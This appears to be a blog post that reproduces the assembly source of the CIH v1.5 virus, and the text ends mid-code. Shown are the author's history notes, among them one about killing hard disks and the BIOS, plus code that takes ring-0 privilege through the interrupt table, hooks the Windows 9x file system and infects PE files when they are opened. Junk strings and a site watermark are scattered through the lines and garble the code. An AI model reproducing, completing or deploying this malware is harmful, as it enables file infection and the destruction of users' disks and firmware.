渴望漂泊的人惟一不飘的是那颗心.

CIH v1.5病毒源

上一篇 / 下一篇  2006-09-10 01:01:16 / 天气: 晴朗 / 心情: 高兴 / 个人分类:汇编编程

查看( 218032 ) / 评论( 0 ) / 评分( 0 / 0 )
****************************************************************************★黑基空间★ S%N7nG Q$R'L
; *                        The Virus Program Information                     *★黑基空间★(C l6FWaXp$`
; ****************************************************************************
h*`2U!Tx5f cq s0; *                                                                          *
0aBmOC i0; *   Designer : CIH                   Source  : TTIT of TATUNG in Taiwan    *★黑基空间★4i"Mm%fTH0e\ L,~
; *   Create Date : 04/26/1998         E-mail  : WinCIH.Tatung@usa.net       *★黑基空间★&V tth9B)x3b Ud}*|
; *   Modification Time : 06/01/1998   Version : 1.5                         *
|:ON7S;J3C`/A0; *                                                                          *★黑基空间★b&hE H%BJ X
; *   Turbo Assembler Version 5.0    : Tasm /m cih                           *
C/N9g#h9Mgcn0; *   Turbo link Version 5.01        : Tlink /3 /t cih, cih.exe              *
7p0LM fU |$\4D0; *                                                                          *
W\^ zV-A[9i0; *==========================================================================*
Z5`}%BW4V]0; *                        Modification History                              *
EmK fY8h$y0; *==========================================================================*
~-i+D7~q,p#O B0; *     v1.0    1. Create the Virus Program.                                 *★黑基空间★V0dnF(om8K-gD
; *             2. The Virus Modifies IDT to Get Ring0 Privilege.            *
l^W@q5um0; * 04/26/1998  3. Virus Code doesn't Reload into System.                    *
-Y+{P }'kf"Y9[N0; *             4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
2~g a^&C){&AI0; *             5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.  *
;L/y3Gl,N3h0; *             6. When System Opens Existing PE File, the File will be      *★黑基空间★s |'T3YTkL
; *                Infected, and the File doesn't be Reinfected.             *★黑基空间★$@`QL0k"^/wRL
; *             7. It is also Infected, even the File is Read-Only.          *
%@!f,@*h ^ h%f|.h7y0; *             8. When the File is Infected, the Modification Date and Time *
1kC/T s&o5u/w0; *                of the File also don't be Changed.                        *
:mO3_U,E0; *             9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call  *★黑基空间★!DYs-[6W0Cx(p6E!i]
; *                Previous FileSystemApiHook, it will Call the Function     *
bgZp/\7l1H0; *                that the IFS Manager Would Normally Call to Implement     *
|-iJ2q+@sV:uW.V0; *                this Particular I/O Request.                              *★黑基空间★B{4}tku$ho
; *            10. The Virus Size is only 656 Bytes.                         *
8PoQ7bK0; *==========================================================================*★黑基空间★Hv1H$b(m9w
; *     v1.1    1. Especially, the File that be Infected will not Increase   *
)N:x4k?Zpkg0; *                it's Size...   ^__^                                       *★黑基空间★ Q;tI+~b I$s6D2t}
; * 05/15/1998  2. Hook and Modify Structured Exception Handing.             *★黑基空间★ |;Z;n"~R sgE
; *                When Exception Error Occurs, Our OS System should be in   *★黑基空间★/r]Y1p@rx w:T
; *                Windows NT. So My Cute Virus will not Continue to Run,    *★黑基空间★ X*E3C7S l2]H^
; *                it will Jmup to Original Application to Run.              *
)PXY7\YL0; *             3. Use Better Algorithm, Reduce Virus Code Size.             *★黑基空间★8e'c-KDS#x C
; *             4. The Virus "Basic" Size is only 796 Bytes.                 *
+W4{Z"BB!Ql3`.A0; *==========================================================================*
] `]zZ!tG0; *     v1.2    1. Kill All HardDisk, and BIOS... Super... Killer...         *
,nEzQ |1n"|7k;d7A0; *             2. Modify the Bug of v1.1                                    *
?5O)f#ww(^^9a0; * 05/21/1998  3. The Virus "Basic" Size is 1003 Bytes.                     *★黑基空间★)?c Fv!RA P(N
; *==========================================================================*
h9axSi5u&K0; *     v1.3    1. Modify the Bug that WinZip Self-Extractor Occurs Error.   *
4o)VSO/G PtP/j0; *                So When Open WinZip Self-Extractor ==> Don't Infect it.   *
y9r6b:K.ON"b0; * 05/24/1998  2. The Virus "Basic" Size is 1010 Bytes.                     *
8BI?%J'w7PmG#{sj0; *==========================================================================*★黑基空间★5q!Yb'q9X%jM
; *     v1.4    1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *★黑基空间★x2QozNTNx @ T
; *             2. Change the Date of Killing Computers.                     *★黑基空间★c5U8t*s5k*D*Ql
; * 05/31/1998  3. Modify Virus Version Copyright.                           *
RJ&S-aw2Q1Pt0; *             4. The Virus "Basic" Size is 1019 Bytes.                     *
G2J+B5_%D%q)Y`0; ****************************************************************************
{R.F9_b n0N1U0; *     v1.5    1. Full Modify the Bug : Change Harddisk Killing Port        *★黑基空间★7C)Y T0HB9Jt
; *             2. Modify Virus Version Copyright.                           *
.B d"IOGb0; * 06/01/1998  3. Clear Garbage in Source Code.                             *
)IZn/wjig,|J0; *             4. The Virus "Small" Size in 10xx Bytes.                     *★黑基空间★S gSs9I&K]}8S3s
; ****************************************************************************
?Z`#YU$W0
vs0XY)k9a#F0                .586★黑基空间★Ek4`Pva\&W

3X2tYc[p3V E0; ****************************************************************************
(Ti{7e%Pn-z(o0; *             Original PE Executable File(Don't Modify this Section)       *★黑基空间★c$n2M [SB.v9v1d3Q W
; ****************************************************************************
m*d va;Jfe0★黑基空间★ s%XXA4N!ot
OriginalAppEXE  SEGMENT
C@(]kr} n~|NU+n0★黑基空间★3\"jE)i~%I:|B
FileHeader:
%`:Rd mdd|;y{0                db      04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
;Yo.o/ua#?'_"r0                db      004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h★黑基空间★uI7^ljPY$c
                db      0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
}iNG*Yp+i6j0                db      040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★,Y H l{L/Le4w
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
s8Y7G:N x&aN0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
SPt sJV:a&w0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★LK(ga@e
                db      000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h★黑基空间★2{Cp j6L0Q
                db      00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh★黑基空间★i.Lr&Lk|)u2|zOW
                db      021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h★黑基空间★+f7ZJ8\ e)R3ky~(r
                db      069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
j6iK+~vx0                db      061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
P \dKj/A H Z0                db      074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh★黑基空间★"F s\S(m
                db      020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h★黑基空间★#rz @ Y8Q
                db      06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah★黑基空间★gN u;B2TVPJ]
                db      024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★5\ _ k#v6i AwhA
                db      050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h★黑基空间★;uxfM,iU4u
                db      0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h★黑基空间★ s6O G[`~b,D$hRR
                db      000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
8| pQbIMH0q0                db      00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h★黑基空间★ k(C c;J;NW0_(P
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★ L^;E7p{/c)@;v0DMV
                db      010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
[p#t$E7yUWA2j9z0                db      000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h★黑基空间★X.My%A~m
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h★黑基空间★9K i&X3yU*P9`
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★N\;L s4u:U)H
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★D cr)Z+c
                db      000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h★黑基空间★4q*Q"r.S*_4yo
                db      000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
-\r2}h4O0                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h★黑基空间★TjE|-Mq2I"VI
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h★黑基空间★0A8s9m(` J4j/^1Q
                db      000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
CT6nw1s2]6L2Zok0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★P_/w7`z.d6d)]"i&R~
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
UODI_0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
[_4PIF4l0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
@+v/e c%^0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
1C9g[3~9q8j7J N0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
"n3w twX;U/{0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
SvkIx/Lm,Y0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★8y DoE2I8|7p:T+p9K
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
0V5n7r1b7K'zv"D5?0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
e#H2i\)W`wb:l0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★TN3`u Q~
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
'x]p&S)Zr/_%Iu0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★iv dZt'{"Wa&x
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
t+G'scm4J3D0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★.wp$J$b!UFLb
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
%@z4HX6yX0                db      02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h★黑基空间★&CV2\ U:uAJ-j
                db      000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
c4E*ZDs9N4{&_7yw [0                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h★黑基空间★ P^.k ^q0?6e
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
*JR3\SzJY0                db      000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h★黑基空间★2k(]X6K4sa'S$D ?7E
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★:Bl1T3N1~$f0?w
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★)VZaF5W Ky
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★i4n{4A%t%Y;y"myB7E
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★O+Q3Txim:e
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★&];? L9JJ
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
ak ~$Q3b0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
.yj T3}9{ w#wL#w0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★b8k,UO ~+yZ
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★&g J'R0p.jd(g
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
b mVIw0                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★ yr+~[9J b'k
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
it:Jy3B-My0                db      0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h★黑基空间★ kO4y8B&Q?L
dd 00000000h, VirusSize
4qcb h&z*w t9v];s0
7I)U#HX9?0OriginalAppEXE  ENDS
.u%u S)x(l{x0
VO0|1U+JLL0; ****************************************************************************
R;~!X Q&[FO0; *                     My Virus Game                                        *★黑基空间★!i(s(s8v#[q+j
; ****************************************************************************
#E0M.[z,RvQ$b0
gR\1PC.K0; *********************************************************
I%]?ls0J${ ~B%R3Ou0; *                    Constant Define                    *★黑基空间★?-_"R+U8L!U
; *********************************************************★黑基空间★wL3\{ m,q"N6^w

(E%};p5PR!nr0TRUE = 1
*l+Gomc;@T"[0FALSE = 0★黑基空间★#S9E.[_ a"vW\sQ p0P
★黑基空间★a$v8P1M(?6L
DEBUG = TRUE
U B?ZyOK0★黑基空间★(|1^c'D2pW/t@
IF DEBUG
_D~6^P(U0
?,V(hz[dc9e;E:z0        FirstKillHardDiskNumber =       82h★黑基空间★]|&a3d-I5H IX/?H
        HookExceptionNumber     =       06h
n5eh|w0★黑基空间★8X2k3r(Fl$w@ ]
ELSE
|+T#}X^fG"z;e n0
/Ud0Uj-m0        FirstKillHardDiskNumber =       81h
D {.ua)k9b'q/qz0        HookExceptionNumber     =       04h★黑基空间★ _F!e @y.H WEO7M#E
★黑基空间★*H%h9E4Qa8I5a#{
ENDIF★黑基空间★o,|5I!D$}7_CN

?X'A}i!f0
%znZ\G;Mm0FileNameBufferSize = 7fh
V%vi }'D&i0
+y g9]vyf2E V{0; *********************************************************
s.U-R o'd0AkF [0; *********************************************************
Rdu`ODJPv0
3y?F)H|ui:U0VirusGame               SEGMENT★黑基空间★ [ {6E'Hj R@2Q

i;G[f"f0_L0                        ASSUME  CS:VirusGame, DS:VirusGame, SS:VirusGame★黑基空间★`3iSaPd @D:^7rS
                        ASSUME  ES:VirusGame, FS:VirusGame, GS:VirusGame★黑基空间★g]'WTua7rS
★黑基空间★ p w CE2K5v-hm:gK
; *********************************************************
k0~;N q y:C y.^S0; *             Ring3 Virus Game Initial Program          *
2oR[:N8s5c8_0; *********************************************************
:b W|!V\P0★黑基空间★ TWS+?9p9f4h!r|
MyVirusStart:
f'zR)IVn3U0push ebp★黑基空间★?3g7\)l3]6c ryXV^
★黑基空间★5Kge9B$y6Z J)G @5O3c
; *************************************★黑基空间★ Tlxh!P7e)gi)f C
; * Let's Modify Structured Exception *
1D:E0KA%Iw%r)\+_ T0; * Handing, Prevent Exception Error  *★黑基空间★,u D C)xH`S of6q|
; * Occurrence, Especially in NT.     *★黑基空间★ l'P;D(L:m m
; *************************************★黑基空间★ ^c;LR7[S1T N

pt8W7l9ke${0lea eax, [esp-04h*2]
O jU)vq9o0xor ebx, ebx
3N4L,d{n XZN9_0xchg eax, fs:[ebx]
9_HAH2~/g*WN9{0call @0
)tl4S@$V a0@0:
J~T:x7z5n&[ c0pop ebx★黑基空间★To U5E"r~G0y8eVG
lea ecx, StopToRunVirusCode-@0[ebx]★黑基空间★ J!Q A0x nX
push ecx
fj3|NN/{P0push eax★黑基空间★!d)J6D5H^k!Q

#o6x@/Je0; *************************************★黑基空间★\t ty!nE^9LIN
; * Let's Modify                      *
.gE*RL6^?~ E0; * IDT(Interrupt Descriptor Table)   *★黑基空间★6B$e%U#[km
; * to Get Ring0 Privilege...         *
eYC3B4C m5X2d0; *************************************
4b3^9pSB!_6R0Oc9t0★黑基空间★$^F?i-L%aA,N)k
push eax ;★黑基空间★$d4C"] j }9q$_ z
                        sidt    [esp-02h]       ; Get IDT Base Address★黑基空间★ws@ |.uQ,Ok|
                        pop     ebx             ;
2Pm4}(R@M N0                        add     ebx, HookExceptionNumber*08h+04h ; ZF = 0
8C]v(f'g:T0cli★黑基空间★.UfF0X)`,nG.v\
                        mov     ebp, [ebx]      ; Get Exception Base★黑基空间★c4n9^6EV v7f
                        mov     bp, [ebx-04h]   ; Entry Point
tZ'hG-k JGQx0                        lea     esi, MyExceptionHook-@1[ecx]
n!g(q#Mp0push esi
3c3L0b+pF1I2a[0rcD0mov [ebx-04h], si ;★黑基空间★,v8mM.J{^"^:^
shr esi, 16 ; Modify Exception
kehq"{0mov [ebx+02h], si ; Entry Point Address★黑基空间★"oG |k_+@:_bv
pop esi★黑基空间★"Jz5V5n:Cb ?,@J1i%R
★黑基空间★Aq_,D:g4d D
; *************************************★黑基空间★d.PB~_
; * Generate Exception to Get Ring0   *
mz(o!NG0; *************************************
,\4fx ^ fMY,\J0
,}e/V-TT+sv0int HookExceptionNumber ; GenerateException★黑基空间★1fNxf*k7Ka0]C
ReturnAddressOfEndException = $★黑基空间★\ z+u+I:^4p @7I7hI
★黑基空间★M`Ka,_K
; *************************************
W:Wht0O!o8|0; * Merge All Virus Code Section      *
h4Z$h6[cv$W)D0; *************************************
/jR"l%G7Gspj2{.qs0
%@l^%Lr0push esi
3|3x.G9]2_ n`0mov esi, eax
"K"v_a&yi t0★黑基空间★/y6h/dmdS'RD \
LoopOfMergeAllVirusCodeSection:
1N!v1va*w1x)}k0★黑基空间★T+EP1U x~,E tE n
mov ecx, [eax-04h]
7f5}(~%q"gZ7q,O s0rep movsb
2k,ZT tVx0sub eax, 08h★黑基空间★,\;W b(Z#A)l%K/L
mov esi, [eax]
zt%dfyJ0or esi, esi
k&wH!{s?h?0jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1★黑基空间★!I5mB8i#i#K}uG
jmp LoopOfMergeAllVirusCodeSection★黑基空间★'S1A+_C*v J%yWi1l
★黑基空间★o{?;c4P
QuitLoopOfMergeAllVirusCodeSection:★黑基空间★D+C F,t1v[o6{xCG

&B|z.L$i9K+u0pop esi★黑基空间★P r?A8Y*ja6O
★黑基空间★ UT!P+^2`s
; *************************************★黑基空间★x)Lv;rCBlr
; * Generate Exception Again          *
C NawW:lA|3g0; *************************************★黑基空间★-bfK~~
★黑基空间★(V-aUx;bZEz4c
int HookExceptionNumber ; GenerateException Again★黑基空间★z:X3dqcK

%B LT:p(B_0; *************************************★黑基空间★ Hq.i9X$I1YhRrV
; * Let's Restore                     *
:T._*Pq/}6lu*jJ5Q0; * Structured Exception Handing      *★黑基空间★"y bN6X$A)A5Q
; *************************************
S5_L;B i'Q T S0
q;M?o%D%{b$h0ReadyRestoreSE:★黑基空间★+I!^ | `^$Q(n`N
sti★黑基空间★:[h`6F2i0xk&Ax4[9qX
xor ebx, ebx★黑基空间★7B7@0LZ Y3U+I
jmp RestoreSE
W+jt*YfR,ZA%q0
U }N$` S(}*j-^1}0; *************************************★黑基空间★$X+}3s] woSO
; * When Exception Error Occurs,      *★黑基空间★M0?pw/V^}b
; * Our OS System should be in NT.    *
){\~ A{5N T0; * So My Cute Virus will not         *
VU Gg-_I[0; * Continue to Run, it Jmups to      *★黑基空间★;x)Fx7R,eo\ n(dP
; * Original Application to Run.      *
;V+a4C:{XA2R2]0; *************************************★黑基空间★!fAUI ]

^8t*k![@/F`#|0StopToRunVirusCode:
I0ZbUm"W0E0@1 = StopToRunVirusCode
3E8V4G|[0
#JrQr.n0xor ebx, ebx
%Zw5{-lj"_F&u0mov eax, fs:[ebx]★黑基空间★8X3P+ip:R
mov esp, [eax]★黑基空间★o pe}H*}Q

c&FZ'C$Y sA0RestoreSE:
:?l%XI;[\m6M"Y0pop dword ptr fs:[ebx]★黑基空间★5C0s#[7g tp c6k
pop eax★黑基空间★ @f8|;uTx(]"Q
★黑基空间★/v,f O6o/}#\I%O
; *************************************★黑基空间★3~Nv8^;oY
; * Return Original App to Execute    *
}l6R\,Na/V0; *************************************★黑基空间★Gx5E:mH

@Ch k7P j5]ty7wB0pop ebp★黑基空间★:EW#T9^2Y4^F$F
                        push    00401000h       ; Push Original★黑基空间★'_J.Hxd+[hJ {'T
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack★黑基空间★(E6@a9g\5B:Qb%\]
                         ret     ; Return to Original App Entry Point
g&JJ/H9hP.|:F!gj0
L^9@fL*T#Q7?*K0; *********************************************************
wh$PLq U(V k[ `@0; *             Ring0 Virus Game Initial Program          *
A7^'Q1bP+x$IA!k0; *********************************************************★黑基空间★%kr{F)h3g!{
★黑基空间★FJP]%W
MyExceptionHook:
Yc8~J]4{v0@2 = MyExceptionHook
;f4Wt"Il6U!m)Y_B0jz InstallMyFileSystemApiHook★黑基空间★@[*u-kC.{T b(G
★黑基空间★4ft nC+k$H*fL
; *************************************★黑基空间★j8acDl6Z
; * Do My Virus Exist in System !?    *
sG4j zx*E ~Z0; *************************************
.c1oe%u~/w}0★黑基空间★$U%EA5j"s1Q
mov ecx, dr0
OXXN`0jecxz AllocateSystemMemoryPage
n%[ jM#[ra3{Us2c8l0add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
+[,ICRkIa0★黑基空间★Z,fu4q}2\kU9c
; *************************************
-}P,f?-V:X7B M}0; * Return to Ring3 Initial Program   *
p(J)v]c2khz0; *************************************
2k0\#jXG A:s1|0★黑基空间★_T~RCf4R7t\
ExitRing0Init:
7Q2Xj8rT m0mov [ebx-04h], bp ;
Y]/a K}`0W0shr ebp, 16 ; Restore Exception
!R |\cov [ebx+02h], bp ;★黑基空间★J*`(V^"k1e)v
iretd★黑基空间★O(T#t&].X1aUk
★黑基空间★R,F1i'ialv4Q
; *************************************★黑基空间★ D_*~C@
; * Allocate SystemMemory Page to Use *
0`1o;?'~8L+^%{ zzp0; *************************************
R1P0[v'[8l W0★黑基空间★(Wl y7n1YX'p$|
AllocateSystemMemoryPage:
:E9q UlD[$Gv q%B0★黑基空间★*[5M0a.sb of
mov dr0, ebx ; Set the Mark of My Virus Exist in System★黑基空间★,A2I4R?QJ
push 00000000fh ;★黑基空间★(l t~h E4|8@H7A
push ecx ;
b U:[8|&` B*W0push 0ffffffffh ;
-] d#yP"B+`*]&Q cohW0push ecx ;★黑基空间★] v t*Y5V4|0qSJ
push ecx ;★黑基空间★H KF_3_
push ecx ;
DV|xa {0push 000000001h ;
Rp |$E+O'sV9U7`t:g,F0push 000000002h ;
JJ3rW"lo2M2m \0int 20h ; VMMCALL _PageAllocate
X/H u`2l3ra0_PageAllocate = $ ;★黑基空间★uC-ZFpew,w9~X
dd 00010053h ; Use EAX, ECX, EDX, and flags
^%P-~t i3j0add esp, 08h*04h★黑基空间★Gw E4~B1Btz_
xchg edi, eax ; EDI = SystemMemory Start Address★黑基空间★TlU'Y+d
lea eax, MyVirusStart-@2[esi]★黑基空间★c#z9e4]'MXAC
iretd ; Return to Ring3 Initial Program★黑基空间★KgE.Q)g)pn
★黑基空间★ a+K6T Bu
; *************************************★黑基空间★r D`v-xgo
; * Install My File System Api Hook   *
PKC!{A&H3U0; *************************************★黑基空间★ \R~K(Rk ~
★黑基空间★7q5E `*U/nSi;U!{
InstallMyFileSystemApiHook:★黑基空间★cM/YV&q4D"X

1f,Q m]B}0lea eax, FileSystemApiHook-@6[edi]★黑基空间★@5{&FY.u3`3A#r
★黑基空间★ViW ?k2QcZ
push eax  ;★黑基空间★"xHw)? X
int 20h  ; VXDCALL IFSMgr_InstallFileSystemApiHook★黑基空间★7WVpQX
IFSMgr_InstallFileSystemApiHook =       $
:VZ(NW:L$O]x+U0dd      00400067h ; Use EAX, ECX, EDX, and flags★黑基空间★cM*a9rY4n @a6V
mov dr0, eax ; Save OldFileSystemApiHook Address
#F0X9snw(tF0pop eax ; EAX = FileSystemApiHook Address
dwr2h'I*F.SN-q0; Save Old IFSMgr_InstallFileSystemApiHook Entry Point★黑基空间★q%BQ2Ji%c-Cy
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
4|8nn5B q*a {0mov edx, [ecx]★黑基空间★^A3A5o]
mov OldInstallFileSystemApiHook-@3[eax], edx
,g,s,qdEfoQ/{/m0; Modify IFSMgr_InstallFileSystemApiHook Entry Point
Oi.M4Z\@b0lea eax, InstallFileSystemApiHook-@3[eax]
8J1O)y%K+b ~8? MJi#Ft0mov [ecx], eax
!b)D2T2wXW^0cli★黑基空间★K.Vy7?~(F B'PG0xY
jmp ExitRing0Init
pOtcGtP0
?^+CM cI0z7py0; *********************************************************★黑基空间★Ix ac&y;yKv*a
; *             Code Size of Merge Virus Code Section     *
8Y8mOC/X#S%W0; *********************************************************★黑基空间★ s]7o@ c

1^2P{R2W6UAx0CodeSizeOfMergeVirusCodeSection = offset $
T3s6GC#]]0
_%V'Sk z6^,Y&r`0; *********************************************************★黑基空间★/e9E1H6ap
; *             IFSMgr_InstallFileSystemApiHook           *
*`%l Qt-a0; *********************************************************
0f\LF&^ov$t6B0★黑基空间★6LZT&b.DF)t2ljm
InstallFileSystemApiHook:
z4X2j-nPo(}0push ebx
;?+H?DFI$`},H0call @4 ;
7[ _S;\.@E&k0@4: ;★黑基空间★,|w$?7@5{
pop ebx ; mov ebx, offset FileSystemApiHook★黑基空间★ H;R"lLpr_1g6[
add ebx, FileSystemApiHook-@4 ;★黑基空间★+w(mr*R P9B/aQ
push ebx★黑基空间★N @Z$Ir
int 20h  ; VXDCALL IFSMgr_RemoveFileSystemApiHook
*B9f h0T(j5HE d0IFSMgr_RemoveFileSystemApiHook = $★黑基空间★g/eR? JTW
dd      00400068h ; Use EAX, ECX, EDX, and flags★黑基空间★/ny4[br%F/}7B
pop eax
^Bc:M Unz,W'C0; Call Original IFSMgr_InstallFileSystemApiHook★黑基空间★)ukI'K(ff?j
; to link Client FileSystemApiHook★黑基空间★`0PO2BD _"F!m#Z
push dword ptr [esp+8]★黑基空间★rX9P^i gg2v
call OldInstallFileSystemApiHook-@3[ebx]
0W~7Hu `0x0pop ecx
%V ^B_;^d` nA r0push eax
]m w/UZfo+A0; Call Original IFSMgr_InstallFileSystemApiHook★黑基空间★/gcg$o }
; to link My FileSystemApiHook★黑基空间★4?,c hI4T'Sp\
push ebx★黑基空间★})v^*aC5`;w
call OldInstallFileSystemApiHook-@3[ebx]★黑基空间★| L}$h2O[jc
pop ecx
R\(g:|T G?dGr3g0mov dr0, eax ; Adjust OldFileSystemApiHook Address
(b}+Qu6b7u3p `0pop eax★黑基空间★)g A1eq4T,b;P
pop ebx★黑基空间★(L.l7da|5s+v%?9nX}
ret
2^u$oe'_%~[0★黑基空间★5Zl%c&_R i~.R
; *********************************************************
x*q:i1g}0; * Static Data                       *★黑基空间★/y _@i-Gd,t.a
; *********************************************************
0R(XXz3]J&r+S/A2\1u0★黑基空间★3` ~4jcl V
OldInstallFileSystemApiHook dd ?★黑基空间★a'BjTE2?^ FL+o
★黑基空间★L M Cic!j `x;|
; *********************************************************
'?$z7N[+y5Db0; *             IFSMgr_FileSystemHook                     *
v^&V1g1a5^!F\0; *********************************************************
*B,gf&sE.[W0★黑基空间★\~ H C8]0JN f
; *************************************
)O CaN _Z P4W^ q1e0; * IFSMgr_FileSystemHook Entry Point *
oxQ,MdyFY p K0; *************************************
A\1eD4wy.H`0★黑基空间★ Td0M3n}r5Pu8M
FileSystemApiHook:
S [)Ec7MOCTpc pA0@3 = FileSystemApiHook★黑基空间★ot RTz*Pn,I

:Uu@:yLDU6Z!K0pushad
NZE4e[o0                        call    @5 ;★黑基空间★3D}]#g}?nl
@5: ;
R1TN0^o-?K c0                        pop     esi ; mov esi, offset VirusGameDataStartAddress
u@_^7{E0                        add     esi, VirusGameDataStartAddress-@5
G P(DIF-W0
k$u6S}h0; *************************************
8y!zs]iX/y P0; * Is OnBusy !?                      *
jI C3s4vz0; *************************************
%Zc,[l-Gu+Ut6F0★黑基空间★J Z%D5x w cE |l
test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
2M_4eD%mPw0jnz pIFSFunc ; goto pIFSFunc★黑基空间★GCtJ |
★黑基空间★2S g,?b$L yi*IW
; *************************************
"~Ef B ? V g0; * Is OpenFile !?                    *★黑基空间★n T{XD1B
; *************************************★黑基空间★`)x ~;G(l$ua

8] F,q*qc$G0; if ( NotOpenFile )★黑基空间★&{#R9]t(@!l"N!G%Z
; goto prevhook
+Z`jX:ovMY0lea ebx, [esp+20h+04h+04h]★黑基空间★];RCh|oU'Q
cmp dword ptr [ebx], 00000024h
DX#K*SrA0jne prevhook
?!q%IE-~Z0
(P9qYO1N9d0; *************************************
c.{A{R~*X:o9sBCM0; * Enable OnBusy                     *
9g*s'i5~y x"J5A_:lkm0; *************************************★黑基空间★a%xv1M2[,l Sy,OD

Tdo6o+U{8S#juM0inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
}E:e2R'[l0
B eD^G0; *************************************
A'q%U-@4z1@bV@0; * Get FilePath's DriveNumber,       *
!lo${V7q5z+f8m s0; * then Set the DriveName to         *
H%RFbRx+sQ0; * FileNameBuffer.                   *
G Z7yn7|0; *************************************★黑基空间★3Ek1WQn-y.y)Y f
; * Ex. If DriveNumber is 03h,        *★黑基空间★+~*i Td2_8[:l D8i
; *     DriveName is 'C:'.            *
:Z+|V$Oq m5{ q,v0; *************************************
!o\~'|rk-zv3q%Y!p0★黑基空间★L!q?PFyJ C1t&?
add esi, FileNameBuffer-@6
2k#Pj/P Oy0Qz+s)[0push esi
lmTiv0mov al, [ebx+04h]★黑基空间★k#u;q*?7DC']\ MpH
cmp al, 0ffh
Pm F W;Dih/W0je CallUniToBCSPath
Q:t'I xuQg&R5E0add al, 40h
t|8\ u@S2s;@6x0mov ah, ':'
1V3d fhRb0mov [esi], eax
1Mi!~ th]Yd b2z0inc esi★黑基空间★-N2R5DfV+H|7| a
inc esi★黑基空间★u&\+sF I
★黑基空间★"b{-{FIL)IGH
; *************************************
-k\o3DM0; * UniToBCSPath                      *
,b"x&FTA/Y0Lb0; *************************************
x7H2[1ij6H1}CH0; * This Service Converts             *
&|H @/a/d1S1A3E.f0; * a Canonicalized Unicode Pathname  *★黑基空间★zv P xA8C'Ak p
; * to a Normal Pathname in the       *
(T~4?Q \[0; * Specified BCS Character Set.      *
MQ ~4D/ag0; *************************************
v#v8Lm}_0
u"G+lc2X2H,iiy6]0CallUniToBCSPath:★黑基空间★P x3i?,d}x#m
push 00000000h
